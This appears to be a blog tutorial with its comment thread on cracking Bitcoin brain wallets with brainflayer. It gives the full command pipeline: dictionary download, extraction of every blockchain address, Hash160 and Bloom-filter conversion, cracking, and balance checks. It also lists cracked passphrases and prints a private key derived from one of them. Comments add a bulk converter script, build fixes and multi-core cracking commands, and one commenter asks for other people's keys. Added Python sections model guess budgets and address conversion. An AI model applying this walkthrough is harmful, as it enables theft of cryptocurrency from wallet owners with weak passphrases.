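Hands-on test of a brain wallet cracking tool

Introduction:
White-hat hacker releases a Bitcoin brain wallet "plunderer" that can guess 130,000 passwords per second
http://www.8btc.com/new-cracking-tool

What follows is a hands-on test of brain wallet password cracking, based on the news item above.

First, the download address for brainflayer, the brain wallet brute-force cracking code: https://github.com/ryancdotorg/brainflayer

1. Brute-forcing brain wallets first requires a powerful dictionary file.
This test uses the CrackStation password dictionary. The file is 15G and contains almost 1.5 billion passwords. Download address: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install the Bitcoin service https://github.com/bitcoin/bitcoin
If you don't know how to install it, don't try the rest; just read along for fun.

3. Use the open-source blockchain tool Blockparser to obtain all Bitcoin addresses.
Blockparser download address: https://github.com/znort987/blockparser
Run Blockparser to obtain all current Bitcoin addresses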

./parser allBalances > allBalances.txt

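This is a very memory-hungry operation; 64G of memory is recommended.
Because allBalances.txt also contains amounts and other information, its contents need to be tidied up with an awk command line. We only need the Bitcoin address information.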

awk '{ print $2 }' allBalances.txt > btcaddress.hex

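4. The Brainflayer cracking program requires its input Bitcoin addresses in Hash160 format, so all the Bitcoin addresses obtained above have to be converted to Hash160 format.
There are many tools of this kind; I used the following Perl code: http://lenschulwitz.com/base58
With a small modification it can convert a whole file. (The code is in the comments below.)

5. Use hex2blf, a tool in the Brainflayer package, to convert the Hash160 addresses into a Bloom filter file.
Brainflayer uses this Bloom filter to greatly increase password cracking speed.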

hex2blf btcaddress.hex btcaddress.blf

6. Start cracking!

brainflayer -b btcaddress.blf -i password.txt

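I really did not expect dozens of cracked results to be printed right after it started running. Running through the whole 15G password file takes several hours, but the cracking efficiency is still really good. The CrackStation password dictionary turned up nearly 20,000 Bitcoin addresses and their corresponding brain wallet passwords!

7. Let's analyse these cracked passwords: (the first column is the Bitcoin address in Hash160 format, the last column is the password)

The simple ones need little comment.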

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

Even very long numeric passwords can be cracked:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

Alphabetic passwords of 15 characters or fewer look useless; far too many of them were cracked.

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

Some very long passwords can be cracked as well, which is a little alarming.

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

There are also Chinese names used as passwords

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

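8. The addresses Brainflayer outputs are in Hash160 format; use the tool from step 4 again to convert them back to ordinary Bitcoin addresses.
For example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Converted to a Bitcoin address it is: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
The brain wallet password is 1satoshi

9. Are you wondering whether these addresses still hold any coins?
Balances can be looked up on Blockchain.info.
They can also be queried through the API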

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

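I checked many of the cracked addresses and every balance was 0. Accounts cracked with such simple dictionaries have presumably had their balances moved out by someone long ago.

10. Finally, if an address really does hold a balance, what is the corresponding private key?
The open-source code Addressgen can generate the Bitcoin address and private key from a brain wallet password.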

https://github.com/sarchar/addressgen

Taking ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi above as the example, step 8 gave the Bitcoin address as:
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49, which is verified below with Addressgen.

Run

./genaddress.py -p 1satoshi

The output is as follows:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

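As shown above, the Bitcoin address is indeed 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
and the corresponding private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

Summary:
A brain wallet password must be extremely strong; even a phrase of many words is not necessarily safe. This test used only a few hours of computing time on a single host to check 1.5 billion password combinations.
If you rented a few dozen cloud hosts and cracked for a month, the number of password combinations tested could exceed ten trillion. Work out for yourself whether your password is strong enough!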
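
The calculation the summary asks for, as an added Python example (not code from the original post or from any of the tools it uses). The guess rate is the per-process figure reported in the comments below; the host count of 40, the one-in-a-million risk bound and the 7776-word Diceware list size are assumptions chosen for illustration.

```python
import math

# Figures from this page: about 100,000 guesses per second for one
# brainflayer process, and a one-month run. HOSTS = 40 is an assumed
# value standing in for "a few dozen cloud hosts".
RATE_PER_HOST = 100_000
HOSTS = 40
SECONDS = 30 * 24 * 3600
CRACKSTATION_ENTRIES = 1_500_000_000  # dictionary size quoted in step 1


def guess_budget(rate=RATE_PER_HOST, hosts=HOSTS, seconds=SECONDS):
    """Total number of passphrases these resources can test."""
    return rate * hosts * seconds


def random_secret_bits(alphabet_size, length):
    """Entropy of `length` symbols drawn uniformly at random."""
    return length * math.log2(alphabet_size)


def listed_phrase_bits(list_size=CRACKSTATION_ENTRIES):
    """A phrase that appears in a wordlist is worth at most log2(list size),
    however many characters it contains."""
    return math.log2(list_size)


def crack_probability(bits, budget):
    """Chance that a secret with `bits` of entropy falls inside the budget."""
    return min(1.0, budget / 2.0 ** bits)


def min_length(alphabet_size, budget, max_probability):
    """Smallest count of random symbols that keeps the chance of being
    guessed within the budget at or below max_probability."""
    length = 1
    while crack_probability(random_secret_bits(alphabet_size, length),
                            budget) > max_probability:
        length += 1
    return length


def report(max_probability=1e-6):
    """Compare a wordlist phrase with randomly generated passphrases."""
    budget = guess_budget()
    return {
        "budget": budget,
        "listed_phrase_bits": round(listed_phrase_bits(), 1),
        "listed_phrase_cracked": crack_probability(listed_phrase_bits(), budget),
        # 7776 is the size of a standard Diceware word list (assumed scheme)
        "diceware_words_needed": min_length(7776, budget, max_probability),
        "lowercase_letters_needed": min_length(26, budget, max_probability),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

Length alone does not count: a quotation that appears in a wordlist is covered by the budget no matter how many characters it has, which matches the long phrases listed in step 7.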

68 thoughts on “Hands-on test of a brain wallet cracking tool”

  • Monday, July 25th, 2016 at 09:54

    I need a more in-depth tutorial on how to do this step by step properly. Thanks if you can send me one by email, please.

    Reply
    • Tuesday, August 2nd, 2016 at 12:55

      Sorry, I don’t have a step by step tutorial.

      Reply
  • Saturday, July 30th, 2016 at 16:43

    Hi pal, great tut. Does this still work? Would love to give it a shot.

    Reply
  • Thursday, September 22nd, 2016 at 03:24

    Hi,

    Great article!

    I have one problem though, at step 4: since I am not a developer, I am having a hard time figuring out what change to make so that it processes a whole file. I am using a csv file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    Reply
    • Thursday, September 22nd, 2016 at 15:46

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      Rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

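      # Read Base58 addresses from base58.txt, one per line
      my $fileSrc = 'base58.txt';
      open(my $fhSrc, '<', $fileSrc) or die "Could not open $fileSrc: $!";

      # Decoded hex values are appended to hex.txt
      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";

      while (my $base58_encoded_address = <$fhSrc>) {
        chomp $base58_encoded_address;               # drop the trailing newline
        next unless length $base58_encoded_address;  # skip blank lines
        my $binary_address = decodebase58tohex($base58_encoded_address);
        say $fhDest $binary_address;
      }

      close $fhSrc;
      close $fhDest;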
      

      This should read base58 address from base58.txt and save the hex format address to hex.txt.

      Reply
      • Thursday, September 22nd, 2016 at 15:54

        Awesome, it worked!

        Thank you!

        Reply
  • Sunday, September 25th, 2016 at 17:18

    Hopefully someone can make a full detail on how to make this work in Linux.

    Reply
    • Sunday, September 25th, 2016 at 17:19

      A tutorial, I mean 🙂

      Reply
  • Wednesday, November 9th, 2016 at 16:25

    How long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing???

    I can make a video tut if Jack doesn’t mind. I can’t explain much of the background processes as I usually compile and pack all data tightly and quickly to script it.

    Reply
    • Sunday, November 13th, 2016 at 21:58

      Use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

      Reply
    • Saturday, January 21st, 2017 at 06:40

      Do you have a video tutorial? It would be great 😀

      Reply
      • Tuesday, January 24th, 2017 at 15:59

        I don’t have any video tutorial for this.

        Reply
  • Wednesday, December 28th, 2016 at 01:05

    Does it still work?

    Reply
  • Friday, January 20th, 2017 at 04:09

    Good day and keep up the good work. Please, I omitted steps 1 – 3 because I am trying to use my wallet ID to check how secure my wallet is, but got stuck on steps 4 to 5.
    Need clarification on the following as a newbie to programming:

    1. Do I need to follow the procedure you suggested on “Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
    rename it to base58perl.pl”
    2. If I am to do the same after the modification, where do I upload the update?

    3. After the aforementioned steps, in what environment in github (is it “bitcoin command prompt” or “brain flayer command prompt”) do I input the command “hex2blf btcaddress.hex btcaddress.blf”?

    4. Also, will I replace btcaddress.hex with the hex value of my public key generated via http://lenschulwitz.com/base58

    Thank you as I await your esteemed clarification

    Reply
    • Tuesday, January 24th, 2017 at 16:50

      1. Yes
      2. You upload the file to where the btcaddress.hex file is. Then run the Perl script to convert the addresses in btcaddress.hex to Hash160 format
      3. Run the command “hex2blf” in a Linux environment
      4. Yes, btcaddress.hex will be updated to Hash160 format

      Reply
  • Thursday, January 26th, 2017 at 04:38

    Thanks so much for your valued feedback.
    Pls help clarify as I am new to programming and my background is Windows.
    1. Would all the downloads from step 1 to step 7 be mounted on a Linux OS like Ubuntu, KDE etc or on github?
    2. Pls, under which tool will I locate btcaddress.hex?
    Apologies to bore you as I await your feedback.

    Reply
    • Tuesday, February 7th, 2017 at 11:25

      1. All tools run on Linux OS
      2. You create the file btcaddress.hex at step 3

      Reply
  • Wednesday, March 8th, 2017 at 16:52

    Upon make request for brainflayer I receive this error:

    gcc -O3 -flto -funsigned-char -falign-functions=16 -falign-loops=16 -falign-jumps=16 -Wall -Wextra -Wno-pointer-sign -Wno-sign-compare -pedantic -std=gnu99 -static brainflayer.o hex.o bloom.o mmapf.o hsearchf.o ec_pubkey_fast.o ripemd160_256.o dldummy.o algo/brainwalletio.o algo/warpwallet.o algo/keccak.o algo/sha3.o algo/brainv2.o secp256k1/.libs/libsecp256k1.a scrypt-jane/scrypt-jane.o -lssl -lrt -lcrypto -lz -lgmp -o brainflayer
    /usr/bin/ld: cannot find -lgmp
    collect2: error: ld returned 1 exit status
    Makefile:68: recipe for target ‘brainflayer’ failed
    make: *** [brainflayer] Error 1

    help please

    Reply
    • Tuesday, October 3rd, 2017 at 15:39
      sudo apt-get install libgmp3-dev
      Reply
  • Saturday, March 11th, 2017 at 18:19

    Please, which app did you use to run the program?

    Reply
  • Thursday, April 27th, 2017 at 07:08

    Hello, pls, I need a private key of someone. How can I get that? All the apps that I downloaded did not work. Pls help me out
    13Ugd1nDEgr9WPTZQVoxu4saqvwetkz7B4

    1J7R8Q2N22Skg9QPAEhW8wBR1jEA4bJPo8

    1H1jr23Vvc9iM575p8QqqM7RWjcaJRHZ6a
    thanks

    Reply
    • Friday, May 5th, 2017 at 12:22

      This tool is not for the purpose of recovering the private key for a given bitcoin address.

      Reply
  • Wednesday, May 3rd, 2017 at 03:16

    Hi Jack,

    I have tried every step in this tutorial (I stripped the 0 balance hashes out), but no luck so far.
    Could you provide a hash that I can put in my list that will definitely result in a match? My brainflayer has been running for quite some time, and there are 0 hits.

    Reply
    • Friday, May 5th, 2017 at 12:10

      The sample hash in this post should work.

      Reply
  • Monday, May 22nd, 2017 at 13:15

    How do I run any of these files on Windows?
    To me these are just folders with random files I have no idea what to do with..
    Just a little help on that would be greatly appreciated!

    Thank You.

    Reply
    • Thursday, June 22nd, 2017 at 22:29

      These tools run on Linux. I don’t have the Windows version.

      Reply
  • Tuesday, May 23rd, 2017 at 02:44

    Hi Jack,
    I have a question: when I run the last program you gave us I get this error,
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 456, in
    main()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 411, in main
    public_key, private_key = gen_key_pair()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 94, in gen_key_pair
    if ssl_library.EC_KEY_generate_key(k) != 1:
    OSError: exception: access violation reading 0xFFFFFFFFD96E1A98
    I import the libeay32.dll both also for win64 also for win 32.
    How can I use this tool?

    Reply
    • Thursday, June 22nd, 2017 at 22:31

      Sorry, I haven’t used these tools on Windows.

      Reply
  • Friday, May 26th, 2017 at 20:54

    If you could make an offline step by step video we all will be very appreciative, sir. Thanks for sharing your knowledge with us

    Reply
  • Thursday, June 1st, 2017 at 00:01

    Hello.
    I have encrypted DOGE wallet.
    I convert encrypted address HERE : http://lenschulwitz.com/base58
    After make this command
    1):-Name:~/brainflayer$ ./hex2blf btcaddress.hex btcaddress.blf
    [*] Initializing bloom filter…
    [*] Loading hash160s from ‘btcaddress.hex’ 100.0%
    [*] Loaded 1 hashes, false positive rate: ~2.298e-167 (1 in ~4.351e+166)
    [*] Writing bloom filter to ‘btcaddress.blf’…
    [+] Success!
    r@r-System-Product-Name:~/brainflayer$

    and create password.txt.

    2)Then use –
    :Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt
    r@r-System-Product-Name:~/brainflayer$

    But output nothing.
    What’s wrong? I should install doge daemon and parse doge blockchain??
    Very need help!

    Reply
  • Thursday, June 1st, 2017 at 00:31

    Seems it works, but no password found

    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s

    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs

    What is wrong???

    Reply
  • Thursday, June 1st, 2017 at 13:01

    Hello.
    I try now find my doge wallet password. Ubuntu 17.04
    But I not have install DOGE wallet like .dogecoin
    I just use address doge wallet on site http://lenschulwitz.com/base58 got hash from him and did btcaddress.blf.

    Seems it works, but no password found
    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s
    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs
    What is wrong???
    If you cannot help me or won’t do it - let me know to my email. Thanx

    Reply
    • Wednesday, August 16th, 2017 at 10:30

      Have you solved the problem? I have the same problem.

      Reply
  • Thursday, June 8th, 2017 at 03:08

    Can we use this on an address that has a balance already, where we just want to find the private key as well as the password? I assume it can be done by pasting the address in the txt file, and then carrying on the procedure?

    Reply
    • Thursday, June 22nd, 2017 at 22:18

      No, this is not a tool to crack or generate private key for a given bitcoin address.

      Reply
  • Monday, June 26th, 2017 at 13:00

    Good day dear Jack
    Great tool …
    So with this tool one could find brainpasswords and would be able to transfer out the funds?
    Doesn’t it make it too easy for the evil-doers?
    Thank you …

    Reply
  • Monday, June 26th, 2017 at 18:36

    With this tool it’s possible to crack a brainwallet private key if you’re lucky. It’s a brute-force password cracking tool.

    This is why brainwallet.org permanently closed.

    Reply
    • Sunday, August 13th, 2017 at 19:16

      I forgot my wallet.dat password 🙁 completely 🙁 It was generated randomly with a simple passgen tool, and the .txt that was containing it – lost.

      All I have is wallet.dat

      This tutorial is useless for me?

      Reply
      • Friday, September 1st, 2017 at 11:21

        No, you can’t use this to recover your private key.

        Reply
  • Saturday, July 29th, 2017 at 11:27

    Hello here, please, is it still working? I am working on a security to make blockchain more better

    Reply
  • Sunday, August 20th, 2017 at 11:38

    Hi Jack.

    Do I need any other dependencies? I have Windows so have installed VM VirtualBox to run Ubuntu.

    I’ve downloaded the full folder from github but when I run the first line. hex2blf btcaddress.hex btcaddress.blf, it says command not found.

    I have navigated to the correct folder using cd, then ls will display all files.

    I have tried
    ./hex2blf btcaddress.hex btcaddress.blf
    ./hex2blf ./btcaddress.hex btcaddress.blf
    hex2blf.c btcaddress.hex btcaddress.blf
    ./hex2blf.c ./btcaddress.hex btcaddress.blf

    Pretty much everything I can think of, but the terminal will give a bash error, or say command not found.

    Please can you assist on what set up I need.
    Thanks

    Reply
    • Friday, September 1st, 2017 at 11:34

      You need to compile the source code you downloaded from the Github.

      Reply
  • Friday, September 1st, 2017 at 11:29

    I am having problem installing the brainflayer on my Linux 2017

    Reply
  • Friday, September 1st, 2017 at 12:18

    Hi.
    Thank you for helping. I have this up and it appears to be running correctly. I ran it on an address I knew I would get a match for and it came back as 1 found. But did not tell me which address was found of the key it used to match, how can I see this?

    Also under point 4, convert addresses to hash160. Is there a bulk tool for this?

    Thank you.

    Reply
    • Thursday, September 28th, 2017 at 11:40

      Check my previous reply for the hash160 conversion tool, or search for “base58perl.pl” on this page.

      Reply
  • Thursday, September 28th, 2017 at 08:55

    When I am trying to hex a bitcoin address with base58perl.pl it gives me an additional 00 before and 8 numbers after. How to fix that? Cause brainflayer does not accept this hex.

    Reply
  • Thursday, September 28th, 2017 at 11:12

    In other words everything works like a charm apart from:

    1) lenschulwitz base58 converter
    When I take your bitcoin address example like 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
    it gives me 00EC42AD7FD54F931274B83F6137379206E458B1063EC89E96 instead of
    ec42ad7fd54f931274b83f6137379206e458b106. Seems the same apart from 00 at the start and 8 digits more at the end. I can’t understand why. Both times, even if I do it on his website or in Perl in my terminal, the result is the same. In other converters everything is OK but you can’t do massive conversion.

    2) In brainflayer you have result: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
    and mine is ec42ad7fd54f931274b83f6137379206e458b106:u:Sha256:1satoshi.
    The difference is only between str and sha256. I do all the same as you but the result is different. I don’t know if it depends on some additional keyword you add in the prompt line or not. Anyway it’s working.

    Waiting for your comment, with best regards, Alex.

    Reply
    • Thursday, September 28th, 2017 at 12:12

      00EC42AD7FD54F931274B83F6137379206E458B1063EC89E96 is the same as
      ec42ad7fd54f931274b83f6137379206e458b106

      This bitcoin address is a 25-byte number which is linked to the hash 160 as follows:
      address = [Version Byte (1)][Hash 160 (20)][Checksum (4)]

      The version byte is simply 0x00 for the main bitcoin network and the 4 checksum bytes are simply the first 4 bytes of the double sha256 hash of the 21 bytes [Version Byte][Hash 160]

      To get only the hash160 in step 4, update the code in base58perl.pl
      change from:
      say $fhDest $binary_address;
      to:
      say $fhDest substr $binary_address, 2, 40;

      Reply
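
The 25-byte layout described in the reply above (version byte, Hash160, 4-byte checksum), as an added Python example that is not part of the original post or of base58perl.pl. It verifies the checksum before returning the Hash160 and also converts back to an address as in step 8; the function names are illustrative, and the sample lines are constructed from the address quoted on this page.

```python
import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _checksum(payload: bytes) -> bytes:
    """First 4 bytes of the double SHA-256 of [version byte][Hash160]."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def b58decode(text: str) -> bytes:
    num = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid Base58 character {ch!r}")
        num = num * 58 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    # Every leading '1' in the text stands for one leading zero byte.
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(raw: bytes) -> str:
    num = int.from_bytes(raw, "big")
    out = ""
    while num:
        num, rem = divmod(num, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out


def address_to_hash160(address: str) -> str:
    """Return the 40-hex-digit Hash160, rejecting damaged addresses."""
    raw = b58decode(address.strip())
    if len(raw) != 25:
        raise ValueError("decoded address is not 25 bytes")
    if raw[:1] != b"\x00":
        raise ValueError("version byte is not 0x00 (main network)")
    if _checksum(raw[:21]) != raw[21:]:
        raise ValueError("checksum mismatch")
    return raw[1:21].hex()


def hash160_to_address(hash160_hex: str) -> str:
    payload = b"\x00" + bytes.fromhex(hash160_hex)
    if len(payload) != 21:
        raise ValueError("Hash160 must be 20 bytes")
    return b58encode(payload + _checksum(payload))


def convert_lines(lines):
    """Convert many addresses; returns (hash160 list, rejected list)."""
    converted, rejected = [], []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            converted.append(address_to_hash160(line))
        except ValueError as err:
            rejected.append((line, str(err)))
    return converted, rejected


# Constructed sample input: the address quoted on this page, a blank line,
# a copy with its last character altered, and a copy containing '0',
# which is not in the Base58 alphabet.
SAMPLE_LINES = [
    "1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49\n",
    "\n",
    "1NYEM85RpgkSofLqDfwjb21o3MD4ibSo48\n",
    "1NYEM85RpgkSofLqDfwjb21o3MD4ibSo40\n",
]

if __name__ == "__main__":
    good, bad = convert_lines(SAMPLE_LINES)
    print(good)
    print(bad)
```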
      • Thursday, September 28th, 2017 at 12:27

        Thank you very much for your answer. Now it is working in the proper way, with this additional string.
        I know that they are the same, but unfortunately brainflayer doesn’t want to accept hash160 in that way, and as I don’t understand coding, I was confused. Now everything is working fine.

        Thank you again, and have a nice day !

        Reply
  • Tuesday, October 3rd, 2017 at 15:34

    Brainflayer required devel libs installed (dependencies)

    sudo apt-get install openssl
    sudo apt-get install libgmp3-dev 
    sudo apt-get install libimobiledevice-dev libplist-dev libusbmuxd-dev libssl-dev zlib1g-dev
    sudo apt-get install dh-autoreconf
    
    Reply
  • Tuesday, October 3rd, 2017 at 15:48

    You might need to update Makefile in Brainflayer if you receive the following error message when you compile the source code.
    from

    LIBS = -lssl -lrt -lcrypto -lz -lgmp

    to

    LIBS = -lssl -lrt -lcrypto -lz -lgmp -lpthread

    Error message:

    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_lock_new':
    (.text+0x25): undefined reference to `pthread_rwlock_init'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_read_lock':
    (.text+0x65): undefined reference to `pthread_rwlock_rdlock'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_write_lock':
    (.text+0x85): undefined reference to `pthread_rwlock_wrlock'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_unlock':
    (.text+0xa5): undefined reference to `pthread_rwlock_unlock'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_lock_free':
    (.text+0xca): undefined reference to `pthread_rwlock_destroy'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_run_once':
    (.text+0xf5): undefined reference to `pthread_once'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_init_local':
    (.text+0x115): undefined reference to `pthread_key_create'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_set_local':
    (.text+0x147): undefined reference to `pthread_setspecific'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_cleanup_local':
    (.text+0x167): undefined reference to `pthread_key_delete'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_get_local':
    (.text+0x133): undefined reference to `pthread_getspecific'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `CRYPTO_THREAD_get_current_id':
    (.text+0x181): undefined reference to `pthread_self'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/libgcc_eh.a(unwind-dw2.o): In function `uw_init_context_1':
    (.text+0x211a): undefined reference to `pthread_once'
    collect2: error: ld returned 1 exit status
    
    Reply
  • Tuesday, October 3rd, 2017 at 16:06

    Brainflayer is not currently multithreaded. If you want to run it on multiple cores, you’ll have to use -n and -k options. Run brainflayer -h for more information.

    I tested brainflayer with a single process on a 1 core VPS with SSD, it can check 100,000 passwords per second.
    If you run 4 processes on a 4 core VPS, it can check 400,000 passwords per second.

    The following command will split the password file into 4 pieces and run 4 separated processes to utilize 4 cores.

    screen -S bf1
    brainflayer -v -n 1/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    screen -S bf2
    brainflayer -v -n 2/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    screen -S bf3
    brainflayer -v -n 3/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    screen -S bf4
    brainflayer -v -n 4/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    Reply
    • Thursday, October 5th, 2017 at 05:09

      I have something like 75 000 p/s using 1 core in VirtualBox on my MacBook Air.
      It checks the big CrackStation dictionary in 4,5 hours, and the small one in 40 min.

      Maybe you have some other links for a big dictionary or passphrases list?

      I have another interesting brute force Python script that uses passphrases, but it’s much lower speed vs brain flayer. If you are interested I will post a link.

      Reply
  • Wednesday, October 4th, 2017 at 00:25

    Please, I find it hard setting it up for the past two months. Please, somebody out there help me. Thank you in advance.

    Reply
  • Thursday, October 5th, 2017 at 11:51

    Please help me out with these errors, they show up when I am trying to compile it
    1. I have this error when trying to compile brainflayer.c
    brainflayer.c: In function ‘main’:
    brainflayer.c:818:9: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
    } else if (time_delta < 2500000000) {
    ^
    brainflayer.c:839:9: warning: format ‘%zu’ expects argument of type ‘size_t’, but argument 4 has type ‘uint64_t’ [-Wformat=]
    );
    ^
    brainflayer.c:839:9: warning: format ‘%zu’ expects argument of type ‘size_t’, but argument 5 has type ‘uint64_t’ [-Wformat=]
    /usr/bin/ld: cannot open output file brainflayer: Is a directory
    collect2: error: ld returned 1 exit status
    2. for hex2blf file
    hex2blf.c: In function ‘main’:
    hex2blf.c:57:7: warning: format ‘%ju’ expects argument of type ‘uintmax_t’, but argument 4 has type ‘__off_t’ [-Wformat=]
